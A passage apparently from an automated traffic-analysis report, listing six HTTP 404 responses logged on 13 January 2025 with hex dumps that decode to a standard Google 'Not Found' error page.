7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:37 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:38 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
